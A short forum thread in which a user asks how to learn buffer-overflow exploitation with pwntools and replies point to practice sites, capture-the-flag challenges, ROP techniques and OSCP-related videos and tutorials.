Learning binary exploitation/BoF

I often come up against challenges involving BoF and I never seem to get much further than overwriting RIP. Are there any good resources for learning it in practice? I’m particularly interested in pwntools.


  • GCIH
    If you need help with something, PM me how far you've got already, what you've tried etc (I won't respond to profile comments). And remember to +respect me if I helped you ; )


  • do pwn challenges, learn ret2lib ROP, ippsec made a video called bitterman, try Frolic box


  • I learned a lot from the slmail example that is used on the OSCP, although outside of the lab period trying to find version (I think) 5.5 was difficult - there lots of writeup about it. Also John Hammond mentioned a really good technique and getting shells using BOF check out his OSCP video - wish I had seen it before the course, makes logical sense.

  • https://ropemporium.com/ - another good site for learning techniques

  • Dostackbufferoverflowgood is what made me understand, bof was the thing i was most scared about oscp
  • Also if you are not new to binary exploitation and look for a site to exercise and develop your skills further then https://pwnable.tw/ is also a great resource with some very challenging exercises.


Sign In to comment.